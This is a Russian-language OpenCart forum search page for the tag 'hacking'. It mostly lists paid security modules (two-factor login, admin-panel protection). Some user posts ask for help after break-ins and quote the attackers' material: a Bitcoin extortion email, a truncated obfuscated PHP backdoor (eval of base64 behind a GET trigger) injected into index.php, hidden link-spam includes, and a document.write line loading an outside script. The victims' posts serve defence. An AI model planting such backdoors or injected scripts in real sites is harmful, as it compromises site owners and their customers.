Поиск по сайту
Результаты поиска по тегам 'взлом'.
Найдено 23 результата
-
Версия 2.0
Модуль позволяет обезопасить ваш интернет-магазин на базе OpenCart 2.х - 3.x от не санкционированного доступа Обеспечивает надежную защиту административной части магазина. Даже в том случае если злоумышленник получил логин и пароль от админ панели Вашего магазина - он не сможет войти! Модуль активирует вход в админ панель магазина используя двух факторную Google авторизацию! Коды доступа меняются с интервалом в 30 секунд! Для использования двух факторной Google авторизации Вам необходимо также скачать и установить на свое мобильное устройство приложение Google Authenticator! Коды доступа генерируются в приложении Google Authenticator Их необходимо вводить в форму авторизации на Вашем сайте Приложение Google Authenticator Вы можете найти и скачать в Play Market на своем мобильном устройстве! Внимание! При использовании двух факторной Google авторизации имейте ввиду возможную рассинхронизацию времени между времененм на хостинге на котором работает Ваш сайт и временем на мобильном устройстве которое Вы используете для получения кодов для прохождения двух факторной Google авторизации Код полученный на Вашем устройстве подходит только в то время которое показывает Ваше мобильное устройство! Лицензия: Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статьями УК (Нарушение авторских и смежных прав) Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным. Тип распространения: as is (как есть) Установка: Для установки модуля users2fa Вам необходимо в административной панели Вашего сайта в Разделе Дополнения -> Установка дополнений загрузить zip архив с модулем После того как модуль установится можно перейти в подраздел Дополнения -> Менеджер дополнений и обновить кеш (иконка в правом верхнем углу) Затем перейдите в раздел Модули/Дополнения (зависит от версии CMS) и нажмите установить около названия модуля. Потом надо перейти в настройки модуля и ввести лицензионный ключ. После ввода ключа переключите модуль в режим включено. Остальные настройки находятся в настройках каждого пользователя у которого есть доступ к админке. После установки в настройках пользователей админ панели появится пункт "Использовать 2fa google авторизацию" Для получения лицензионного ключа напишите мне в личном сообщении от имени того, на кого покупался модуль: Название модуля Доменное имя вашего магазина Доменное имя тестовой площадки (если таковая имеется) Допускается тестирование в течении 2-х недель Ваш адрес электронной почты, куда выслать ключ Замечания к версии В версии 2.0 обновлен алгоритм генерации кодов. Работоспособность предыдущих версий не гарантируется! Модуль поддерживает Украинский, русский и английский языки. Если Ваш магазин на каком-то другом языке то названия/пункты могут быть не видны. Скачанные файлы имеют названия указывающие на ветку версий OpenCart/OcStore для которых они предназначены. Например _oc3x предназначен для OpenCart/OcStore 3.x.x Но если есть oc3020 то для OpenCart 3.0.2.0 следует использовать именно этот файл. В Google Play при поиске приложения Google Authenticator надо обращать внимание на производителя. Оригинальный разработчик Google LLC. Приложение Authenticator других разработчиков может также работать но при этом обычно содержит много рекламы. Если Вы не можете пройти проверку то причина в последнюю очередь может быть в плохой камере смартфона. Google Authenticator сканирует очень надежно даже с камерой 2mp. Вероятнее всего причина в неправильном времени на сервере. Попросите поддержку синхронизировать время на виртуальном хостинге или VPS.15.00 USD -
Версия 1.0.3
Дополнительная защита админки - это модуль, который позволяет установить дополнительную защиту админки. Так же вы можете навсегда забанить по IP тех кто пытается войти в админку, а также включать Google reCaptcha на странице авторизации в админке. Уважаемые покупатели. На demo сайте за частую отображена только часть функционала, которую выполняет модуль, так как тяжело спрогнозировать то что нужно будет вам. По этому пожалуйста если у вас есть вопросы по работе модуля или у вас есть конкретная задача но вы сомневаетесь поможет ли её решить модуль то я рекомендую вам спросить об этом на странице поддержки модуля или же написать мне личное сообщение. FAQ - здесь собраны ответы на самые популярные вопросы. ❖ ПРЕИМУЩЕСТВО НАД ТЕМАТИЧЕСКИМИ МОДУЛЯМИ ➥ управление модулем выполнено на одной странице. ➥ редактирование параметров модуля выполняется без перезагрузки страницы. ➥ удобная система push уведомлений для панели управления модуля. ➥ возможность экспорта и импорта настроек модуля. ➥ возможность редактирования файла стилей модуля через панель управления модуля. ➥ возможность дополнительно защитить страницу входа в админку от любых посетителей. ➥ возможность навсегда заблокировать любого посетителя, который пытается получить доступ к странице входа в админку. ➥ модуль не содержит файлов, в которых код зашифрован или обфусцирован. ❖ НЕМНОГО О ЦИФРАХ ➥ в состав модуля входит свыше 166 файлов. ➥ общий размер файлов меньше 1.27Mb (без сжатия). ➥ модуль переведен на 3 языка (English, Украинский, Русский). ➥ свыше 90 параметров настройки модуля. ❖ СПИСОК ВОЗМОЖНОСТЕЙ ❏ Основное ➥ доступно 2 вида дополнительной защиты: графический ключ и секретный ключ + пароль. ➥ возможность отправлять уведомления на электронную почту администратора, когда кто-то пытается получить доступ к странице администратора. ➥ возможность дополнительно защитить страницу входа в админку от любых посетителей. ➥ возможность навсегда заблокировать любого посетителя, который пытается получить доступ к странице входа в админку. ➥ возможность стилизации графического ключа и его страницы. ➥ возможность использовать Google reCaptcha для страницы входа администратора. ❏ Другое ➥ поддержка multi-языков. ➥ поддержка multi-магазинов. ➥ поддержка RTL или LTR направление текста. ➥ модуль требует активацию лицензии. ❖ DEMO САЙТ ➥ Админка: demo / demo | Смотреть ➥ Каталог: Смотреть ❖ СОВМЕСТИМОСТЬ С OPENCART ➥ 1.5.5.1, 1.5.6, 1.5.6.1, 1.5.6.2, 1.5.6.3, 1.5.6.4 ➥ 2.0.0.0, 2.0.1.0, 2.0.1.1, 2.0.2.0, 2.0.3.1, 2.1.0.1, 2.1.0.2, 2.2.0.0, 2.3.0.2 ➥ 3.0.0.0, 3.0.1.1, 3.0.1.2, 3.0.2.0, 3.0.3.0, 3.0.3.1, 3.0.3.2, 3.0.3.3, 3.0.3.5, 3.0.3.6 ❖ СОВМЕСТИМОСТЬ С OCSTORE ➥ 2.1.0.1, 2.1.0.1.1, 2.1.0.2, 2.1.0.2.1, 2.3.0.2, 2.3.0.2.1, 2.3.0.2.2, 2.3.0.2.3, 2.3.0.2.5 ❖ СИСТЕМНЫЕ ТРЕБОВАНИЯ ➥ Минимальная версия PHP: 5.4. ➥ Модуль не работает на localhost. ❖ ЛИЦЕНЗИОННОЕ СОГЛАШЕНИЕ Приобретая ПО, разработанные OCdevWizard, вы подтверждаете, что прочитали и согласны с условиями этого соглашения. Соглашение вступает в силу с момента покупки ПО, проданного через этот сайт, или получения его по электронной почте или любым другим способом. Если вы не согласны с этими условиями лицензирования, не используйте и/или не покупайте это ПО. Покупая ПО от автора OCdevWizard, пользователь соглашается c: ➥ ПО на 100% с открытым исходным кодом, и вы можете его использовать без каких-либо подписок или ежегодных платежей. ➥ Вы имеете право на использование обновлений ПО и премиальную техническую поддержку (консультации по настройке ПО и исправление ошибок проектирования) в течение 1 года после покупки. ➥ Покупатель имеет право использовать ПО по принципу «одна купленная лицензия на одну установку OpenCart». ➥ Вы можете использовать одну лицензию в мульти-магазине OpenCart с несколькими доменами, при условии что это одна установка OpenCart. ➥ Вы не можете продавать или перепродавать это ПО без письменного разрешения автора (OCdevWizard). ➥ Вы не можете давать в качестве подарка или распространять это ПО без письменного разрешения автора (OCdevWizard). ➥ Вы не можете изменять название этого ПО без письменного разрешения автора (OCdevWizard). ➥ Вы не можете представлять это ПО как собственное. ➥ Вы не можете использовать или извлекать компоненты ПО для использования их вне файлов ПО. ➥ Вы не можете удалять из файлов ПО копирайт автора (OCdevWizard). ➥ ПО предоставляется по принципу «AS IS». ➥ ПО проводило тесты на стандартной установке OpenCart, не гарантируется корректная работа ПО на не стандартных конфигурациях OpenCart. Автор ПО оставляет за собой право вносить изменения в условия данного лицензионного соглашения и изменять его пункты в любое время без дополнительных уведомлений, а также оставляет за собой право прекратить поддержку, отказать в доступе к обновлениям если пользователь нарушает это лицензионное соглашение. ❖ ПОДДЕРЖКА ➥ Пожалуйста, используйте мой сайт технической поддержки клиентов, чтобы запросить помощь или сообщить о ошибке. ➥ Пожалуйста, не используйте комментарии для сообщений об ошибках. ➥ Платная техническая поддержка выполняется в случаях, когда существует конфликт с внешними модулями/продуктами/шаблонами. Пожалуйста, примите это с пониманием того, что разработчик не может сделать собственный модуль на 100% совместимым со всеми внешними расширениями. Вот почему в некоторых случаях необходимо адаптировать модуль к нестандартной конфигурации и системным настройкам магазина. Поэтому решение таких проблем будет оплачиваться отдельно от стоимости модуля.20.00 USD-
- ocdevwizard
- admin security
- (и ещё 16)
-
мы рекомендуем [Поддержка] Дополнительная защита админки
OCdevWizard опубликовал теме в Модули и дополнения
20 Завантажити / Придбати розширення Дополнительная защита админки Дополнительная защита админки - это модуль, который позволяет установить дополнительную защиту админки. Так же вы можете навсегда забанить по IP тех кто пытается войти в админку, а также включать Google reCaptcha на странице авторизации в админке. Уважаемые покупатели. На demo сайте за частую отображена только часть функционала, которую выполняет модуль, так как тяжело спрогнозировать то что нужно будет вам. По этому пожалуйста если у вас есть вопросы по работе модуля или у вас есть конкретная задача но вы сомневаетесь поможет ли её решить модуль то я рекомендую вам спросить об этом на странице поддержки модуля или же написать мне личное сообщение. FAQ - здесь собраны ответы на самые популярные вопросы. ❖ ПРЕИМУЩЕСТВО НАД ТЕМАТИЧЕСКИМИ МОДУЛЯМИ ➥ управление модулем выполнено на одной странице. ➥ редактирование параметров модуля выполняется без перезагрузки страницы. ➥ удобная система push уведомлений для панели управления модуля. ➥ возможность экспорта и импорта настроек модуля. ➥ возможность редактирования файла стилей модуля через панель управления модуля. ➥ возможность дополнительно защитить страницу входа в админку от любых посетителей. ➥ возможность навсегда заблокировать любого посетителя, который пытается получить доступ к странице входа в админку. ➥ модуль не содержит файлов, в которых код зашифрован или обфусцирован. ❖ НЕМНОГО О ЦИФРАХ ➥ в состав модуля входит свыше 166 файлов. ➥ общий размер файлов меньше 1.27Mb (без сжатия). ➥ модуль переведен на 3 языка (English, Украинский, Русский). ➥ свыше 90 параметров настройки модуля. ❖ СПИСОК ВОЗМОЖНОСТЕЙ ❏ Основное ➥ доступно 2 вида дополнительной защиты: графический ключ и секретный ключ + пароль. ➥ возможность отправлять уведомления на электронную почту администратора, когда кто-то пытается получить доступ к странице администратора. ➥ возможность дополнительно защитить страницу входа в админку от любых посетителей. ➥ возможность навсегда заблокировать любого посетителя, который пытается получить доступ к странице входа в админку. ➥ возможность стилизации графического ключа и его страницы. ➥ возможность использовать Google reCaptcha для страницы входа администратора. ❏ Другое ➥ поддержка multi-языков. ➥ поддержка multi-магазинов. ➥ поддержка RTL или LTR направление текста. ➥ модуль требует активацию лицензии. ❖ DEMO САЙТ ➥ Админка: demo / demo | Смотреть ➥ Каталог: Смотреть ❖ СОВМЕСТИМОСТЬ С OPENCART ➥ 1.5.5.1, 1.5.6, 1.5.6.1, 1.5.6.2, 1.5.6.3, 1.5.6.4 ➥ 2.0.0.0, 2.0.1.0, 2.0.1.1, 2.0.2.0, 2.0.3.1, 2.1.0.1, 2.1.0.2, 2.2.0.0, 2.3.0.2 ➥ 3.0.0.0, 3.0.1.1, 3.0.1.2, 3.0.2.0, 3.0.3.0, 3.0.3.1, 3.0.3.2, 3.0.3.3, 3.0.3.5, 3.0.3.6 ❖ СОВМЕСТИМОСТЬ С OCSTORE ➥ 2.1.0.1, 2.1.0.1.1, 2.1.0.2, 2.1.0.2.1, 2.3.0.2, 2.3.0.2.1, 2.3.0.2.2, 2.3.0.2.3, 2.3.0.2.5 ❖ СИСТЕМНЫЕ ТРЕБОВАНИЯ ➥ Минимальная версия PHP: 5.4. ➥ Модуль не работает на localhost. ❖ ЛИЦЕНЗИОННОЕ СОГЛАШЕНИЕ Приобретая ПО, разработанные OCdevWizard, вы подтверждаете, что прочитали и согласны с условиями этого соглашения. Соглашение вступает в силу с момента покупки ПО, проданного через этот сайт, или получения его по электронной почте или любым другим способом. Если вы не согласны с этими условиями лицензирования, не используйте и/или не покупайте это ПО. Покупая ПО от автора OCdevWizard, пользователь соглашается c: ➥ ПО на 100% с открытым исходным кодом, и вы можете его использовать без каких-либо подписок или ежегодных платежей. ➥ Вы имеете право на использование обновлений ПО и премиальную техническую поддержку (консультации по настройке ПО и исправление ошибок проектирования) в течение 1 года после покупки. ➥ Покупатель имеет право использовать ПО по принципу «одна купленная лицензия на одну установку OpenCart». ➥ Вы можете использовать одну лицензию в мульти-магазине OpenCart с несколькими доменами, при условии что это одна установка OpenCart. ➥ Вы не можете продавать или перепродавать это ПО без письменного разрешения автора (OCdevWizard). ➥ Вы не можете давать в качестве подарка или распространять это ПО без письменного разрешения автора (OCdevWizard). ➥ Вы не можете изменять название этого ПО без письменного разрешения автора (OCdevWizard). ➥ Вы не можете представлять это ПО как собственное. ➥ Вы не можете использовать или извлекать компоненты ПО для использования их вне файлов ПО. ➥ Вы не можете удалять из файлов ПО копирайт автора (OCdevWizard). ➥ ПО предоставляется по принципу «AS IS». ➥ ПО проводило тесты на стандартной установке OpenCart, не гарантируется корректная работа ПО на не стандартных конфигурациях OpenCart. Автор ПО оставляет за собой право вносить изменения в условия данного лицензионного соглашения и изменять его пункты в любое время без дополнительных уведомлений, а также оставляет за собой право прекратить поддержку, отказать в доступе к обновлениям если пользователь нарушает это лицензионное соглашение. ❖ ПОДДЕРЖКА ➥ Пожалуйста, используйте мой сайт технической поддержки клиентов, чтобы запросить помощь или сообщить о ошибке. ➥ Пожалуйста, не используйте комментарии для сообщений об ошибках. ➥ Платная техническая поддержка выполняется в случаях, когда существует конфликт с внешними модулями/продуктами/шаблонами. Пожалуйста, примите это с пониманием того, что разработчик не может сделать собственный модуль на 100% совместимым со всеми внешними расширениями. Вот почему в некоторых случаях необходимо адаптировать модуль к нестандартной конфигурации и системным настройкам магазина. Поэтому решение таких проблем будет оплачиваться отдельно от стоимости модуля. Автор OCdevWizard долучення 11.04.20 Категорія Модули Системные требования Минимальная версия PHP: 5.4 Метод активации По запросу в ЛС По запросу на почту По емейлу Через официальный сайт дополнения Ioncube Loader Нет ocStore 3.0 2.3 2.2 2.1 OpenCart.Pro, ocShop Не проверялось Звернення до сервера розробника Да- 6 ответов
-
- ocdevwizard
- admin security
- (и ещё 16)
-
Версия 1.0.0
Модуль позволяет обезопасить доступ к профилю покупателей на сайтах с CMS OcStore/OpenCart 2.х от не санкционированного доступа Обеспечивает надежную защиту профиля покупателя магазина. Даже в том случае если злоумышленник получил логин и пароль от профиля покупателя магазина - он не сможет войти! Модуль активирует вход в профиль покупателя магазина используя двух факторную Google авторизацию! Модуль интегрируется в стандартную тему OcStore/Opencart Коды доступа меняются с интервалом в 30 секунд! Для использования двух факторной Google авторизации Вам необходимо также скачать и установить на свое мобильное устройство приложение Google Authenticator! Коды доступа генерируются в приложении Google Authenticator Их необходимо вводить в форму авторизации на Вашем сайте Приложение Google Authenticator Вы можете найти и скачать в Play Market на своем мобильном устройстве! Внимание! При использовании двух факторной Google авторизации имейте ввиду возможную рассинхронизацию времени между времененм на хостинге на котором работает Ваш сайт и временем на мобильном устройстве которое Вы используете для получения кодов для прохождения двух факторной Google авторизации Код полученный на Вашем устройстве подходит только в то время которое показывает Ваше мобильное устройство! Лицензия: Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав) Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным. Тип распространения: as is (как есть) Установка: Для установки модуля customers2fa Вам необходимо в административной панели Вашего сайта в Разделе Дополнения -> Установка дополнений загрузить zip архив с модулем После того как модуль установится можно перейти в подраздел Дополнения -> Менеджер дополнений и обновить кеш (иконка в правом верхнем углу) После установки в меню профиля покупателя появятся пункты "2fa google авторизация"10.00 USD-
- защита
- покупатели
- (и ещё 4)
-
Версия 1.0.1
Модуль позволит обезопасить ваш интернет-магазин на базе OpenCart 2.х от взлома, обеспечит надежную защиту административной части магазина. Даже если вы случайно попались на уловки мошенников или злоумышленник получил данные для входа - не проблема! Модуль обеспечит надежную защиту, просто настройте модуль и можете забыть о проблемах с безопасностью! Модуль умеет : Открывать доступ к административной части магазина по секретному ключу. Пример: www.site.com/admin?my_secret_key. Видео: http://take.ms/NgocS Открывать доступ для разрешенных IP адресов Добавлять капчу reCaptcha от google при авторизации. Капча усложняет процесс перебора паролей (брута) В планах: Добавить 2х этапную авторизацию от google. Усложнить процесс создания секретного ключа Добавить возможность задавать ссылку для переадресации Лицензия: Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав) Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным. Тип распространения: as is (как есть) Установка: Загрузить через стандартный установщик Opencart После установки в настройках магазина появится пункт "Защита админ панели" Важно! Чтобы работала reCaptcha нужно настроить модуль "Дополнения → Captcha → reCaptcha" Важно! Если у вас переименованная папка admin модуль не будет работать10.00 USD- 17 отзывов
-
- 7
-
- безопасность
- защищенная админка
- (и ещё 3)
-
10 Завантажити / Придбати розширення Защита от вирусов и хакеров Модуль позволит обезопасить ваш интернет-магазин на базе OpenCart 2.х от взлома, обеспечит надежную защиту административной части магазина. Даже если вы случайно попались на уловки мошенников или злоумышленник получил данные для входа - не проблема! Модуль обеспечит надежную защиту, просто настройте модуль и можете забыть о проблемах с безопасностью! Модуль умеет : Открывать доступ к административной части магазина по секретному ключу. Пример: www.site.com/admin?my_secret_key. Видео: http://take.ms/NgocS Открывать доступ для разрешенных IP адресов Добавлять капчу reCaptcha от google при авторизации. Капча усложняет процесс перебора паролей (брута) В планах: Добавить 2х этапную авторизацию от google. Усложнить процесс создания секретного ключа Добавить возможность задавать ссылку для переадресации Лицензия: Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав) Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным. Тип распространения: as is (как есть) Установка: Загрузить через стандартный установщик Opencart После установки в настройках магазина появится пункт "Защита админ панели" Важно! Чтобы работала reCaptcha нужно настроить модуль "Дополнения → Captcha → reCaptcha" Важно! Если у вас переименованная папка admin модуль не будет работать Автор ArtemPitov долучення 14.01.18 Категорія Модули Системные требования PHP 5.4 и выше Метод активации Без активации Ioncube Loader Нет ocStore 2.3 2.2 2.1 OpenCart.Pro, ocShop Opencart.pro 2.3 Opencart.pro 2.1 OcShop 2.0.3.х Не проверялось Звернення до сервера розробника Нет
- 94 ответа
-
- 1
-
- безопасность
- защищенная админка
- (и ещё 3)
-
На почту пришло такое письмо. Как защитить сайт? Мы взломали ваш сайт http://www.brandoptics.com.ua и извлекли ваши базы данных. Как это случилось? Наша команда обнаружила уязвимость на вашем сайте, которую мы смогли использовать. После обнаружения уязвимости мы смогли получить учетные данные вашей базы данных, извлечь всю базу данных и перенести информацию на оффшорный сервер. Что это значит? Мы будем систематически проходить через ряд шагов, наносящих полный ущерб вашей репутации. Сначала ваша база данных будет пропущена или продана самой высокой цене, которую они будут использовать с какими бы намерениями они ни были. Затем, если будут найдены электронные письма, они будут отправлены по электронной почте, что их информация была продана или утечка, и ваш сайт http://www.brandoptics.com.ua был виноват, таким образом, нанося ущерб вашей репутации и вызывая злых клиентов / партнеров с что бы ни делали злые клиенты / партнеры. Наконец, любые ссылки, которые вы проиндексировали в поисковых системах, будут деиндексироваться на основе техник блэкхата, которые мы использовали в прошлом для индексации наших целей. Как мне это остановить? Мы готовы воздержаться от разрушения репутации вашего сайта за небольшую плату. Текущая плата составляет 2000 долларов США в биткойнах (BTC). Отправьте биткойн по следующему адресу биткойна (скопируйте и вставьте, так как он чувствителен к регистру): 1Md6imvB2neTF3s1kFiMG473k1XrBhxQhF Как только вы заплатите, мы автоматически получим уведомление о том, что это был ваш платеж. Обратите внимание, что вы должны произвести оплату в течение 5 дней после получения этого уведомления или утечки из базы данных, отправки электронных писем и начала индексации вашего сайта! Как я могу получить биткойны? Вы можете легко купить биткойны через несколько веб-сайтов или даже в автономном режиме через биткойн-банкомат. Мы предлагаем вам https://cex.io/ для покупки биткойнов. Что если я не буду платить? Если вы решите не платить, мы начнем атаку в указанную дату и будем поддерживать ее до тех пор, пока вы этого не сделаете. Никаких мер противодействия этому нет, вы в конечном итоге потратите больше денег, пытаясь найти решение. Мы полностью уничтожим вашу репутацию среди Google и ваших клиентов. Это не обман, не отвечайте на это письмо, не пытайтесь рассуждать или вести переговоры, мы не будем читать никаких ответов. Как только вы заплатите, мы прекратим то, что мы делали, и вы больше никогда не услышите от нас! Обратите внимание, что Биткойн является анонимным, и никто не узнает, что вы выполнили его. телефон: Германия
-
Добрый день. Есть сайт https://okupi.net/ , с утра его взломали, висит фраза K4RNOS WAS HERE! HACKED! WWW.CYBER-DEMONS.COM, доступ к админке есть, сайт стоит на официально купленном шаблоне shop-store 2. Ничего на него не заливалось. Восстановление вплоть до копии 2-х месячной давности не дает результатов, все остается по прежнему. Может есть какие либо подсказки, буду очень признателен и спасибо
-
Приветствую! Кто сталкивался? К index.php прицепилась такая хрень "if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVz..." Саму хрень я конечно убрал, но дыра, через которую это было прицеплено, мне пока не известна. Так жить дальше нельзя. Возможно кто-то сталкивался с подобным, буду благодарен за дельный совет, как пролезли, как закрыть дыру. Всем спасибо!
-
Opencart 1.5.4 добавляют sape и linkfeed в код сайта
proseotut опубликовал теме в Вопросы безопасности
Добрый день кто-то уже сталкивался с тем, что с сайта начинают торговать ссылками в невидимом блоке - добавили код в шаблон сайта, который размещает на страницах ссылки sape и linkfeed? появляются папки с id юзеров в папке: /catalog/view/image а коды размещения модуля на странице в контроллех прописаны и в шаблоне сайта пример такого кода в footer.php global $linkfeed; define('LINKFEED_USER', 'тут код одного юзера'); require_once($_SERVER['DOCUMENT_ROOT'].'/catalog/view/image/'.LINKFEED_USER.'/linkfeed.php'); $linkfeed = new LinkfeedClient(); global $sape; if (!defined('_SAPE_USER')){define('_SAPE_USER', 'тут код другого юзера');} require_once($_SERVER['DOCUMENT_ROOT'].'/catalog/view/image/'._SAPE_USER.'/sape.php'); $o = array(); $o['charset'] = 'UTF-8'; //ваша кодировка $o['force_show_code'] = false; //показать проверочный код $sape = new SAPE_client($o); ?> пример вывода в шаблоне, к сожалению, не сохранился( удалили, заменили доступы, прошло пару недель и он снова на сайте. Если вы справились, подскажите решение, как исправить? -
Добрый день! Ребят, кто понимает, в чем может быть проблема? Вы не могли бы взглянуть на сайт, либо взлом, либо проблема с шаблоном... Перед этим всем в карточках товара вылазила ошибка 500 Пробовали делать Бэк-ап, но на следующий день снова имеем то, что имеем (кривую главную страницу и всё) mnogo-mozaiki.ru Для удобства и быстроты связи можете писать в вотсап 89150803060 Роман
-
Старый сайт: OcStore 1.5 Тема стандартная (defaut) Сегодня зашел на него, а он грузится почти минуту. Полез смотреть в начале через chrome, что увидел: что то такое (картинка из инета) В хидере под тегом <head> был скрипт с ссылкой на на данный ресурс. Побежал в header.tpl (catalog\view\theme\default\template\common) увидел там такую вещь: <?php foreach ($scripts as $script) { ?> <script type="text/javascript" src="<?php echo $script; ?>"></script> <?php } ?> Понимаю, что данная херота может инклудится вот сюда из любого файла Нашел ее довольно быстро, а именно в catalog\view\javascript\common.js В конце файла была приписка: document.write('<script src="https://afrodizinlife.gq"><\x2fscript>'); Собственно вопрос: Как такие вещи вообще происходят на opencart? P.S. По поводу паролей можно не писать: 1. 10 значные с спецсимволами + регистры 2. В браузере не храню 3. В FileZilla тоже не храню Я, конечно, понимаю, что все зависит от определенной сборки, шаблона и установленного на сайт, но есть ли основные дыры, которые необходимо латать? Или какие то минимумы, что необходимо сделать всем и вся?
- 9 ответов
-
- взлом
- opencart 1.5
-
(и ещё 1)
Теги:
-
15 Скачать / Купить дополнение Модуль позволяет обезопасить ваш интернет-магазин на базе OpenCart 2.х от не санкционированного доступа Обеспечивает надежную защиту административной части магазина. Даже в том случае если злоумышленник получил логин и пароль от админ панели Вашего магазина - он не сможет войти! Модуль активирует вход в админ панель магазина используя двух факторную Google авторизацию! Коды доступа меняются с интервалом в 30 секунд! Для использования двух факторной Google авторизации Вам необходимо также скачать и установить на свое мобильное устройство приложение Google Authenticator! Коды доступа генерируются в приложении Google Authenticator Их необходимо вводить в форму авторизации на Вашем сайте Приложение Google Authenticator Вы можете найти и скачать в Play Market на своем мобильном устройстве! Внимание! При использовании двух факторной Google авторизации имейте ввиду возможную рассинхронизацию времени между времененм на хостинге на котором работает Ваш сайт и временем на мобильном устройстве которое Вы используете для получения кодов для прохождения двух факторной Google авторизации Код полученный на Вашем устройстве подходит только в то время которое показывает Ваше мобильное устройство! Лицензия: Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статьями УК (Нарушение авторских и смежных прав) Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным. Тип распространения: as is (как есть) Установка: Для установки модуля users2fa Вам необходимо в административной панели Вашего сайта в Разделе Дополнения -> Установка дополнений загрузить zip архив с модулем После того как модуль установится можно перейти в подраздел Дополнения -> Менеджер дополнений и обновить кеш (иконка в правом верхнем углу) Затем перейдите в раздел Модули/Дополнения (зависит от версии CMS) и нажмите установить около названия модуля. Потом надо перейти в настройки модуля и ввести лицензионный ключ. После ввода ключа переключите модуль в режим включено. Остальные настройки находятся в настройках каждого пользователя у которого есть доступ к админке. После установки в настройках пользователей админ панели появится пункт "Использовать 2fa google авторизацию" Для получения лицензионного ключа напишите мне в личном сообщении от имени того, на кого покупался модуль: Название модуля Доменное имя вашего магазина Доменное имя тестовой площадки (если таковая имеется) Допускается тестирование в течении 2-х недель Ваш адрес электронной почты, куда выслать ключ Замечания к версии В версии 2.0 обновлен алгоритм генерации кодов. Работоспособность предыдущих версий не гарантируется! Модуль поддерживает Украинский, русский и английский языки. Если Ваш магазин на каком-то другом языке то названия/пункты могут быть не видны. Скачанные файлы имеют названия указывающие на ветку версий OpenCart/OcStore для которых они предназначены. Например _oc3x предназначен для OpenCart/OcStore 3.x.x Но если есть oc3020 то для OpenCart 3.0.2.0 следует использовать именно этот файл. В Google Play при поиске приложения Google Authenticator надо обращать внимание на производителя. Оригинальный разработчик Google LLC. Приложение Authenticator других разработчиков может также работать но при этом обычно содержит много рекламы. Если Вы не можете пройти проверку то причина в последнюю очередь может быть в плохой камере смартфона. Google Authenticator сканирует очень надежно даже с камерой 2mp. Вероятнее всего причина в неправильном времени на сервере. Попросите поддержку синхронизировать время на виртуальном хостинге или VPS. Добавил mirek Добавлено 02.04.2018 Категория Модули Ioncube Loader Нет ocStore 3.0 2.3.0.2.4 2.3 2.2 2.1 OpenCart.Pro, ocShop Не проверялось Обращение к серверу разработчика Нет
-
10 Завантажити / Придбати розширення Двух факторная Google авторизация для покупателей Модуль позволяет обезопасить доступ к профилю покупателей на сайтах с CMS OcStore/OpenCart 2.х от не санкционированного доступа Обеспечивает надежную защиту профиля покупателя магазина. Даже в том случае если злоумышленник получил логин и пароль от профиля покупателя магазина - он не сможет войти! Модуль активирует вход в профиль покупателя магазина используя двух факторную Google авторизацию! Модуль интегрируется в стандартную тему OcStore/Opencart Коды доступа меняются с интервалом в 30 секунд! Для использования двух факторной Google авторизации Вам необходимо также скачать и установить на свое мобильное устройство приложение Google Authenticator! Коды доступа генерируются в приложении Google Authenticator Их необходимо вводить в форму авторизации на Вашем сайте Приложение Google Authenticator Вы можете найти и скачать в Play Market на своем мобильном устройстве! Внимание! При использовании двух факторной Google авторизации имейте ввиду возможную рассинхронизацию времени между времененм на хостинге на котором работает Ваш сайт и временем на мобильном устройстве которое Вы используете для получения кодов для прохождения двух факторной Google авторизации Код полученный на Вашем устройстве подходит только в то время которое показывает Ваше мобильное устройство! Лицензия: Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав) Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным. Тип распространения: as is (как есть) Установка: Для установки модуля customers2fa Вам необходимо в административной панели Вашего сайта в Разделе Дополнения -> Установка дополнений загрузить zip архив с модулем После того как модуль установится можно перейти в подраздел Дополнения -> Менеджер дополнений и обновить кеш (иконка в правом верхнем углу) После установки в меню профиля покупателя появятся пункты "2fa google авторизация" Автор mirek долучення 07.04.18 Категорія Модули Системные требования Метод активации Без активации Ioncube Loader Нет ocStore 2.3 2.2 2.1 OpenCart.Pro, ocShop Не проверялось Звернення до сервера розробника Нет
